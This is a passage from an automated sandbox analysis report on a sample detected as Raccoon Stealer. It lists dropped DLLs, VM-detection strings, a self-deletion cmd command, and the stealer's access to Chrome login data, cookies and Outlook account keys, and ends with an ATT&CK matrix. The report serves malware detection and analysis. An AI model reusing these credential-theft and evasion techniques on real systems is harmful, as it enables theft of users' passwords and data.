                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Self deletion via cmd deleteShow sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041DD0B __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041DD0B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exe TID: 6116Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 4396Thread sleep count: 87 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\lgpllibs.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy_InUse.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\qipcap.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleHandler.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\freebl3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssdbm3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\libEGL.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32_InUse.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\prldap60.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldif60.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\mozMapi32.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\nssckbi.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\ldap60.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\IA2Marshal.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\AccessibleMarshal.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\breakpadinjector.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\MapiProxy.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\qO7qM6fA3\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened / queried: C:\Program Files (x86)\Hyper-V\VMCreate.exeJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_004362A1
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043DA90 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_0043DA90
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0045E752 FindFirstFileExW,0_2_0045E752
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00434721 __EH_prolog,GetLogicalDriveStringsA,0_2_00434721
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: Amcache.hve.0.drBinary or memory string: VMware
                      Source: Amcache.hve.0.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.0.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.0.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.294431831.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.305356064.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316187429.0000000000562000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.me
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.305347531.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWi
                      Source: Amcache.hve.0.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.0.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004333DD LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004333DD
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004322AF __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree,0_2_004322AF
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_004362A1
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,StrToIntA,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,0_2_00429B40
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0045084A GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_0045084A
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00435C73 __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,0_2_00435C73
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00427AAA GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,0_2_00427AAA
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004362A1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,0_2_004362A1
                      Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)Show sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet SettingsJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsProcess Injection11Obfuscated Files or Information3LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing22Security Account ManagerFile and Directory Discovery4SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Timestomp1NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol115SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
